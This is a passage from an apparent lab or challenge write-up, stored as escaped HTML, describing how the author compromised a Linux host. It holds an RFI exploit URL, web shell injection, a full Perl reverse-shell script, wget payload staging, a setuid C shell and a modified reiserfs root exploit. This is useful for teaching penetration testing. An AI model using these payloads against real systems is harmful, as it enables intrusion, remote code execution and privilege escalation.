192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.18<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.13<\/span>\" (Guess probability: 86%)\n[+] Cleaning up scan engine\n[+] Modules deinitialized\n[+] Execution completed.<\/pre>\n<p>Taking this into account, this can only mean that the asp files are either just static pages, or just renamed php files, served via a custom handler.<\/p>\n<p>Looking at the other folders and files I discovered in the bruteforce, my attention was drawn by a file called \/1\/index.asp<\/p>\n<p>While requests to other pages seem to redirect to images or just return 200 OK, this page appeared to have some content.<\/p>\n<p>Look back at the login form on the first page... It seems to be just a static html, renamed to an asp page, without any real code behind it. No matter what you enter as username\/password, you always end up on the page again. So that either means that there's code behind it that doesn't show anything, or that there is no code behind it. No way to really tell at this point.<\/p>\n<p>But in the case the \/1\/index.asp page, things are different.<\/p>\n<p>If you enter a username and press the enter button, something actually returns, so it looks like there is some code behind this page :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image19.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb19.png\" alt=\"image\" width=\"462\" height=\"159\" border=\"0\" \/><\/a><\/p>\n<p>Looking at the field names in the html source of the page, I see this :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">html<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">head<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">title<\/span><span style=\"color: #0000ff;\">&gt;<\/span>Page title<span style=\"color: #0000ff;\">&lt;\/<\/span><span style=\"color: #800000;\">title<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;\/<\/span><span style=\"color: #800000;\">head<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">body<\/span><span style=\"color: #0000ff;\">&gt;<\/span><span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">div<\/span> <span style=\"color: #ff0000;\">align<\/span>=<span style=\"color: #0000ff;\">\"center\"<\/span><span style=\"color: #0000ff;\">&gt;<\/span>Wrong username or password.<span style=\"color: #0000ff;\">&lt;\/<\/span><span style=\"color: #800000;\">div<\/span><span style=\"color: #0000ff;\">&gt;<\/span><span style=\"color: #008000;\">&lt;!--  This is the login form  --&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">form<\/span> <span style=\"color: #ff0000;\">method<\/span>=<span style=\"color: #0000ff;\">\"post\"<\/span> <span style=\"color: #ff0000;\">action<\/span>=<span style=\"color: #0000ff;\">\"\/1\/index.asp\"<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\nUsername: <span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">input<\/span> <span style=\"color: #ff0000;\">type<\/span>=<span style=\"color: #0000ff;\">\"text\"<\/span> <span style=\"color: #ff0000;\">name<\/span>=<span style=\"color: #0000ff;\">\"slogin_POST_username\"<\/span> <span style=\"color: #ff0000;\">value<\/span>=<span style=\"color: #0000ff;\">\"corelanc0d3r\"<\/span><span style=\"color: #0000ff;\">&gt;<\/span><span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">br<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\nPassword: <span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">input<\/span> <span style=\"color: #ff0000;\">type<\/span>=<span style=\"color: #0000ff;\">\"password\"<\/span> <span style=\"color: #ff0000;\">name<\/span>=<span style=\"color: #0000ff;\">\"slogin_POST_password\"<\/span><span style=\"color: #0000ff;\">&gt;<\/span><span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">br<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;<\/span><span style=\"color: #800000;\">input<\/span> <span style=\"color: #ff0000;\">type<\/span>=<span style=\"color: #0000ff;\">\"submit\"<\/span> <span style=\"color: #ff0000;\">name<\/span>=<span style=\"color: #0000ff;\">\"slogin_POST_send\"<\/span> <span style=\"color: #ff0000;\">value<\/span>=<span style=\"color: #0000ff;\">\"Enter\"<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;\/<\/span><span style=\"color: #800000;\">form<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;\/<\/span><span style=\"color: #800000;\">body<\/span><span style=\"color: #0000ff;\">&gt;<\/span>\n<span style=\"color: #0000ff;\">&lt;\/<\/span><span style=\"color: #800000;\">html<\/span><span style=\"color: #0000ff;\">&gt;<\/span><\/pre>\n<p>A quick Google search for the fieldnames (slogin_username or just slogin_ in general) in this asp script provided me with a few resources :<\/p>\n<p><a title=\"http:\/\/www.dreamweaverclub.com\/forum\/showthread.php?t=24851\" href=\"http:\/\/www.dreamweaverclub.com\/forum\/showthread.php?t=24851\">http:\/\/www.dreamweaverclub.com\/forum\/showthread.php?t=24851<\/a><\/p>\n<p>=&gt; and that page leads me to :<\/p>\n<p><a href=\"http:\/\/www.mariovaldez.net\/software\/sitefilo\/install.php\">http:\/\/www.mariovaldez.net\/software\/sitefilo\/install.php<\/a> (Simple Text-File Login script)<\/p>\n<p>which in return brings me at : <a title=\"http:\/\/www.milw0rm.com\/exploits\/7444\" href=\"http:\/\/www.milw0rm.com\/exploits\/7444\">http:\/\/www.milw0rm.com\/exploits\/7444<\/a><\/p>\n<p>In fact, http:\/\/192.168.6.66\/1\/version.txt confirms that this might be the code that is installed on the system :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image20.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb20.png\" alt=\"image\" width=\"282\" height=\"262\" border=\"0\" \/><\/a><\/p>\n<p>Based on the milw0rm entry, it looks like this code may be vulnerable to a RFI (Remote File Inclusion \/ Sensitive Data Disclosure bug)<\/p>\n<p>Let's try the Data Disclosure bug first.\u00a0\u00a0 The advisory states that the default username\/password file is called slog_users.txt.<\/p>\n<p>Unfortunately this file does not contain what we had expected :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image21.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb21.png\" alt=\"image\" width=\"380\" height=\"144\" border=\"0\" \/><\/a><\/p>\n<p>(maybe they renamed the file and changed the filename in slogin_lib.inc.php). We can try to bruteforce these files, but let's save some time and try to find out if we can use the RFI bug. An RFI bug can lead to a lot of things, including injecting code and run it on the webserver (if we can for example inject it into a file that is used in a vulnerable \"include\" statement).<\/p>\n<p>A request to http:\/\/192.168.6.66\/1\/slogin_lib.inc.php resulted in a 200 OK reply, so the file seems to be there.<\/p>\n<p>The exploit code (milw0rm) indicates that this \"Simple Text-File Login script\"\u00a0 file (slogin_lib.inc.php) can be exploited using the following request :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">[!] EXPLOIT: \/[<span style=\"color: #0000ff;\">path<\/span>]\/slogin_lib.inc.php?slogin_path=[remote_txt_shell]<\/pre>\n<blockquote><p>Current time is 3:30am. Time for bed.<\/p>\n<p>Sunday morning, 10am. Back in business, time to continue work... reading all about the RFI bug, trying out some requests... but nothing seems to work today.<\/p><\/blockquote>\n<p>Around 4pm, I tried this :<\/p>\n<p>http:\/\/192.168.6.66\/1\/slogin_lib.inc.php?slogin_path=http:\/\/192.168.6.71\/&cmd=ls%20-als<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image22.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb22.png\" alt=\"image\" width=\"501\" height=\"149\" border=\"0\" \/><\/a><\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image23.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb23.png\" alt=\"image\" width=\"414\" height=\"219\" border=\"0\" \/><\/a><\/p>\n<p>aha- that looks great. It looks like code can be injected (header.inc.php file) and it would run on the webserver. (header.inc.php is added to the request automatically, so if I host some code in a file called header.inc.php, it would get included by just pointing the parameter to the root of the webserver.<\/p>\n<p>I already figured out I can run commands within the context of the webserver account, but perhaps things can be made a bit easier : inject a full blown php shell.<\/p>\n<p>Plan :<\/p>\n<ul>\n<li>get a copy of a php webshell (I used c99 but there are many more)<\/li>\n<li>rename it to header.inc.php,<\/li>\n<li>host it somewhere so it can be injected into the request<\/li>\n<li>inject\/execute it<\/li>\n<\/ul>\n<p>Where can I find a webserver for this... ?\u00a0 I could try to host it on my attacker machine... but there is a better solution.\u00a0 There's a webserver (surgemail) available on 192.168.6.70\/71\/72.\u00a0\u00a0 I have ftp write access to that server, so I can just drop some files in the c:\\surgemail\\www folder.<\/p>\n<p>In addition to the webshell, it might be nice to have a reverse shell set up from the webserver to my box, so I can easily issue OS commands.\u00a0 One of my friends (mr_me) gave me a copy of cb_shell.pl, I simply renamed it to corelanshell.pl and uploaded it to the webserver as well \ud83d\ude42<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">#!\/usr\/bin\/perl\n#\n# Connect back shell version 0.0\n# Created by Depth\n# Full hide version\n# Use: cb_shell.pl &lt;address&gt; &lt;port&gt; &lt;fake_name&gt;\n# netcat -l -p &lt;port&gt; (localhost)\n# \n\n<span style=\"color: #0000ff;\">use<\/span> IO::Socket;\n$0 = $ARGV[2];\n<span style=\"color: #0000ff;\">my<\/span> $sock = new IO::Socket::INET (PeerAddr =&gt; $ARGV[0],PeerPort =&gt; $ARGV[1],Proto =&gt; 'tcp');\n<span style=\"color: #0000ff;\">connect<\/span>(CLIENT,$sockaddr); \n\n<span style=\"color: #0000ff;\">print<\/span> $sock \"<span style=\"color: #8b0000;\">:: Depth :: Connect Back Shell ::\\n<\/span>\";\n<span style=\"color: #0000ff;\">if<\/span>(<span style=\"color: #0000ff;\">fork<\/span>() == 0){\n STDIN-&gt;fdopen($sock,w);\n STDOUT-&gt;fdopen($sock,w);\n STDERR-&gt;fdopen($sock,w);\n <span style=\"color: #0000ff;\">system<\/span>(\"<span style=\"color: #8b0000;\">\/bin\/sh<\/span>\");\n <span style=\"color: #0000ff;\">close<\/span>($sock);\n <span style=\"color: #0000ff;\">exit<\/span>;\n}<\/pre>\n<p>Upload script in action (saves me some time when machines get reverted \ud83d\ude42 )<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# ftp -inv 192.168.6.70 &lt; ftpcmd       \nConnected to 192.168.6.70.\n220-Complete FTP server\n220 FTP Server v 3.3.0\n331 Password required for devil\n230 User devil logged in.\nRemote <span style=\"color: #0000ff;\">system<\/span> type is UNIX.\nUsing binary mode to transfer files.\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......\/surgemail<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......\/surgemail\/www<\/span>\".\n200 Type set to I\n<span style=\"color: #0000ff;\">local<\/span>: corelanshell.pl remote: corelanshell.pl\n200 PORT command successful.\n150 Opening BINARY mode data connection for corelanshell.pl\n226 Transfer complete.\n519 bytes sent in 0.00 secs (2077.2 kB\/s)\n<span style=\"color: #0000ff;\">local<\/span>: header.inc.php remote: header.inc.php\n200 PORT command successful.\n150 Opening BINARY mode data connection for header.inc.php\n226 Transfer complete.\n150397 bytes sent in 0.94 secs (156.4 kB\/s)\n221 Goodbye.<\/pre>\n<p>Ok, so far so good. Next, I will<\/p>\n<p>1. get the header.inc.php to execute and give me a nice web shell gui<\/p>\n<p>2. use the gui to download the corelanshell.pl file<\/p>\n<p>3. execute the perl script and get myself a reverse shell<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Step 1 :<\/strong><\/p>\n<p>http:\/\/192.168.6.66\/1\/slogin_lib.inc.php?slogin_path=http:\/\/192.168.6.70\/<\/p>\n<p>=&gt; This will basically grab the php shell from 192.168.6.70 (in the webroot, header.inc.php) and execute it<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image99.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image99_thumb.png\" alt=\"image\" width=\"380\" height=\"353\" border=\"0\" \/><\/a><\/p>\n<p>Using the \"find all writeable dirs and files\" option, I gathered a list of writeable folders :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">  2693    4 -rw-rw-rw-   1 root     root          163 May  4 15:52 \/var\/run\/motd\n   840    0 lrwxrwxrwx   1 root     root            5 May  4 02:26 \/var\/tmp -&gt; \/tmp\/\n  2696    0 drwxrwxrwt   4 root     root           80 May  4 15:52 \/var\/lock\n 35652    0 lrwxrwxrwx   1 root     root           18 Apr 29 21:25 \/var\/lib\/python-support -&gt; \/usr\/lib\/pymodules\n  5339    0 lrwxrwxrwx   1 root     root            7 Apr 29 21:18 \/var\/spool\/mail -&gt; ..\/mail\n 49222    4 drw-rw-rw-   2 root     root         4096 May  4 06:55 \/opt\/data\n    15    0 lrwxrwxrwx   1 root     root            7 Apr 29 21:18 \/media\/floppy -&gt; floppy0\n    13    0 lrwxrwxrwx   1 root     root            6 Apr 29 21:18 \/media\/cdrom -&gt; cdrom0\n 16655    0 lrwxrwxrwx   1 root     root           37 Apr 29 21:19 \/initrd.img -&gt; boot\/initrd.img-2.6.31-14-generic-pae\n 36865    1 drwxrwxrwt   2 root     root         1024 May  4 05:43 \/tmp\/.X11-unix\n 24577    1 drwxrwxrwt   2 root     root         1024 May  4 05:43 \/tmp\/.ICE-unix\n4026531841    0 lrwxrwxrwx   1 root     root            8 May  4 16:01 \/proc\/net -&gt; self\/net\n4026531840    0 lrwxrwxrwx   1 root     root           11 May  4 16:01 \/proc\/mounts -&gt; self\/mounts<\/pre>\n<p>\/var\/lock might be a good target to place my files.<\/p>\n<p><strong>Step 2 :<\/strong><\/p>\n<p>Went to the \/var\/lock folder and downloaded the corelanshell.pl file from the webserver at 192.168.6.70 :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image25.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb25.png\" alt=\"image\" width=\"309\" height=\"356\" border=\"0\" \/><\/a><\/p>\n<p>=&gt;<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image26.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb26.png\" alt=\"image\" width=\"363\" height=\"133\" border=\"0\" \/><\/a><\/p>\n<p><strong>Step 3 :<\/strong><\/p>\n<p>First, set up a netcat listener on my \"attacker\" machine :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">nc -lvp 4455<\/pre>\n<p>Next, ran the following command on the server :<\/p>\n<p>perl \/var\/lock\/corelanshell.pl 192.168.6.114 4455 :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image27.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb27.png\" alt=\"image\" width=\"297\" height=\"416\" border=\"0\" \/><\/a><\/p>\n<p>Result :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# nc -lvp 4455             \nlistening on [any] 4455 ...\n<span style=\"color: #0000ff;\">connect<\/span> to [192.168.6.114] from (UNKNOWN) [192.168.6.66] 56073\n:: Depth :: Connect Back Shell ::<\/pre>\n<p>Ok, I've got a nice reverse shell.<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# nc -lp 4455\n:: Depth :: Connect Back Shell ::\npwd\n\/var\/<span style=\"color: #0000ff;\">lock<\/span>\nls -al\ntotal 8\ndrwxrwxrwt  4 root     root      100 May  4 15:58 .\ndrwxr-xr-x 14 root     root     4096 May  4 02:26 ..\ndrwxr-xr-x  2 www-data root       40 May  4 15:52 apache2\n-rw-r--r--  1 www-data www-data  519 May  6  2010 corelanshell.pl\ndrwx------  2 root     root       40 May  4 15:52 lvm<\/pre>\n<p>Unfortunately I'm not running as root, so if the secret file is hidden somewhere\/protected, then I need to find a way to get more privs.<\/p>\n<p>Just to be sure, I did a quick search for all txt files, but couldn't find anything useful.<\/p>\n<p>Perhaps a local root exploit might work. The system seems to be running<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">Linux ghost 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU\/Linux<\/pre>\n<p>I tried about a dozen of local root exploits... but they all failed miserably... and lost a huge amount of time... (and I have to admit that I'm not that strong in Linux exploitation. )<\/p>\n<p>But I never give up.<\/p>\n<p>I looked at \/etc\/fstab :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">cat \/etc\/fstab\n# \/etc\/fstab: static file <span style=\"color: #0000ff;\">system<\/span> information.\n#\n# Use 'blkid -o <span style=\"color: #0000ff;\">value<\/span> -s UUID' to <span style=\"color: #0000ff;\">print<\/span> the universally unique identifier\n# for a device; this may be used with UUID= as a more robust way to name\n# devices that works even <span style=\"color: #0000ff;\">if<\/span> disks are added and removed. See fstab(5).\n#\n# &lt;file <span style=\"color: #0000ff;\">system<\/span>&gt; &lt;mount point&gt;   &lt;type&gt;  &lt;options&gt;       &lt;<span style=\"color: #0000ff;\">dump<\/span>&gt;  &lt;pass&gt;\nproc            \/proc           proc    defaults        0       0\n\/dev\/mapper\/ghost-root \/               ext4    errors=remount-ro 0       1\n# \/boot was on \/dev\/sda5 during installation\nUUID=f9f46813-a78a-42e8-a007-53308212ee26 \/boot           ext2    defaults        0       2\n\/dev\/sdb1 \/apachelogs          reiserfs    user,noauto,rw,<span style=\"color: #0000ff;\">exec<\/span>,suid,user_xattr        0       2\n\/dev\/sdc1 \/tmp         ext2        noexec,nosuid,rw                    0       0\n\/dev\/mapper\/ghost-swap_1 none            swap    sw              0       0\n\/dev\/scd0       \/media\/cdrom0   udf,iso9660 user,noauto,<span style=\"color: #0000ff;\">exec<\/span>,utf8 0       0\n\/dev\/fd0        \/media\/floppy0  auto    rw,user,noauto,<span style=\"color: #0000ff;\">exec<\/span>,utf8 0       0<\/pre>\n<p>=&gt; \/apachelogs has reiserfs... and that's suspicious.<\/p>\n<p>So I searched for a local sploit that takes advantage of a bug in reiserfs, and I found this one :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image34.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb34.png\" alt=\"image\" width=\"282\" height=\"82\" border=\"0\" \/><\/a><\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image35.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb35.png\" alt=\"image\" width=\"283\" height=\"56\" border=\"0\" \/><\/a><\/p>\n<p><a title=\"http:\/\/www.exploit-db.com\/exploits\/12130\" href=\"http:\/\/www.exploit-db.com\/exploits\/12130\">http:\/\/www.exploit-db.com\/exploits\/12130<\/a><\/p>\n<p>After having poked around on the server, I noticed that tools such as gcc, cc etc were missing, and that paths to common binaries were not defined.\u00a0 On top of that, the default exploit code is based on the fact that the root filesystem is reiserfs, which is not the case here.<\/p>\n<p>I figured I would end up having to mod the python code (preferably on the machine itself), and that would be problematic with my perl connect-back shell (vim issues etc). So I decided to make my life somewhat easier and decided to use rrs to get a better shell (compiled, renamed it to corelanshell, uploaded it to 192.168.6.70, downloaded it into \/apachelogs\/data and ran it)<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image31.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb31.png\" alt=\"image\" width=\"649\" height=\"171\" border=\"0\" \/><\/a><\/p>\n<p>By that time, another revert wiped out my files again, and I figured to just mod the files offline and use the perl connect back script. It should work just fine.<\/p>\n<p>&nbsp;<\/p>\n<p>Anyways, this is what was needed to root the box and see if the proof file can be found in one of the \"root-protected\" folders:<\/p>\n<ol>\n<li>compile the payload separately (because there is no cc\/gcc on the ghost machine)<\/li>\n<li>edit the python script and change all paths to absolute references.\u00a0 The plan is to put the files on \/apachelogs\/data (just a folder to keep files together) and run the script\/pre-compiled code from there<\/li>\n<li>upload the files (precompiled exploit + python script) and put the script in a location that is not mounted with noexec<\/li>\n<li>make the necessary reiserfs folder on the filesystem<\/li>\n<li>execute the script &amp; sploit<\/li>\n<li>search proof file and cat the contents<\/li>\n<\/ol>\n<p>&nbsp;<\/p>\n<p><strong>Step 1<\/strong> : compiling the payload (offline, I just used my backtrack system to compile \ud83d\ude42<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# cat corelanc0d3r.c\nint main(void) { setgid(0); setuid(0); execl(\"<span style=\"color: #8b0000;\">\/bin\/sh<\/span>\", \"<span style=\"color: #8b0000;\">sh<\/span>\", 0); }\nroot@krypt2:\/vpn\/70# cc -w corelanc0d3r.c -o corelanc0d3r<\/pre>\n<p>&nbsp;<\/p>\n<p><strong>Step 2<\/strong> : Modify the original python script<\/p>\n<ul>\n<li>leave out the components that would deal with the compilation and check if the compilation was successful<\/li>\n<li>make absolute file\/path references<\/li>\n<li>point the xattrs into \/apachelogs (instead of \/)<\/li>\n<\/ul>\n<p>(sud0 and the others from Corelan Team fixed most of the issues I had with the script - and they finally rooted the machine before I could... so big kudos to them)<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">import<\/span> <span style=\"color: #0000ff;\">os<\/span>, <span style=\"color: #0000ff;\">sys<\/span>\n#SHELL = 'int main(void) { setgid(0); setuid(0); execl(\"<span style=\"color: #8b0000;\">\/bin\/sh<\/span>\", \"<span style=\"color: #8b0000;\">sh<\/span>\", 0); }'\nXATTR = '\\x41\\x58\\x46\\x52\\xc1\\x00\\x00\\x02\\x01\\x00\\x00\\x02\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n \n<span style=\"color: #0000ff;\">def<\/span> err(txt):\n    <span style=\"color: #0000ff;\">print<\/span> '[-] error: %s' % txt\n    <span style=\"color: #0000ff;\">sys<\/span>.<span style=\"color: #0000ff;\">exit<\/span>(1)\n \n<span style=\"color: #0000ff;\">def<\/span> msg(txt):\n    <span style=\"color: #0000ff;\">print<\/span> '[+] %s' % txt\n \n<span style=\"color: #0000ff;\">def<\/span> main():\n    msg('checking for reiserfs mount with user_xattr mount option')\n    f = <span style=\"color: #0000ff;\">open<\/span>('\/etc\/fstab')\n    for line in f:\n        <span style=\"color: #0000ff;\">if<\/span> 'reiserfs' in line and 'user_xattr' in line:\n            break\n    <span style=\"color: #0000ff;\">else<\/span>:\n        err('failed to <span style=\"color: #0000ff;\">find<\/span> a reiserfs mount with user_xattr')\n    f.<span style=\"color: #0000ff;\">close<\/span>()\n \n    msg('checking for private xattrs directory at \/apachelogs\/.reiserfs_priv\/xattrs')\n \n    <span style=\"color: #0000ff;\">if<\/span> not <span style=\"color: #0000ff;\">os<\/span>.<span style=\"color: #0000ff;\">path<\/span>.exists('\/apachelogs\/.reiserfs_priv\/xattrs'):\n        err('failed to locate private xattrs directory')\n  \n    msg('capturing pre-shell snapshot of private xattrs directory')\n    pre = set(<span style=\"color: #0000ff;\">os<\/span>.listdir('\/apachelogs\/.reiserfs_priv\/xattrs'))\n     \n    msg('setting dummy xattr to get reiserfs object id')\n \n    ret=<span style=\"color: #0000ff;\">os<\/span>.system('setfattr -n \"<span style=\"color: #8b0000;\">user.hax<\/span>\" -v \"<span style=\"color: #8b0000;\">hax<\/span>\" \/apachelogs\/<span style=\"color: #0000ff;\">data<\/span>\/corelanc0d3r')\n    <span style=\"color: #0000ff;\">if<\/span> ret != 0:\n        err('error setting xattr, you need setfattr')\n \n    msg('capturing post-shell snapshot of private xattrs directory')\n    post = set(<span style=\"color: #0000ff;\">os<\/span>.listdir('\/apachelogs\/.reiserfs_priv\/xattrs'))\n    objs = post.difference(pre)\n \n    msg('found %s <span style=\"color: #0000ff;\">new<\/span> object ids' % len(objs))\n    for obj in objs:\n        msg('setting cap_setuid\/cap_setgid capabilities on object id %s' % obj)\n        f = <span style=\"color: #0000ff;\">open<\/span>('\/apachelogs\/.reiserfs_priv\/xattrs\/%s\/security.capability' % obj, 'w')\n        f.<span style=\"color: #0000ff;\">write<\/span>(XATTR)\n        f.<span style=\"color: #0000ff;\">close<\/span>()\n \n    msg('spawning setuid shell...')\n    <span style=\"color: #0000ff;\">os<\/span>.system('\/apachelogs\/<span style=\"color: #0000ff;\">data<\/span>\/corelanc0d3r')\n \n<span style=\"color: #0000ff;\">if<\/span> __name__ == '<span style=\"color: #0000ff;\">__main__<\/span>':\n    main()<\/pre>\n<p>&nbsp;<\/p>\n<p><strong>Step 3 <\/strong>: upload the files<\/p>\n<p>I basically uploaded both files (corelanc0d3r and reis.py) to 192.168.6.70 (via ftp, put them in c:\\surgemail\\www). Next, I downloaded them from my os shell onto the \"ghost\" machine using some simple wget calls.<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# ftp -<span style=\"color: #0000ff;\">inv<\/span> 192.168.6.70 &lt; ftpcmd \nConnected to 192.168.6.70.\n220-Complete FTP server\n220 FTP Server v 3.3.0\n331 Password required for devil\n230 User devil logged in.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......\/surgemail<\/span>\".\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......\/surgemail\/www<\/span>\".\n200 Type set to I\nlocal: corelanc0d3r remote: corelanc0d3r\n200 PORT command successful.\n150 Opening BINARY mode <span style=\"color: #0000ff;\">data<\/span> connection for corelanc0d3r\n226 Transfer complete.\n9125 bytes sent in 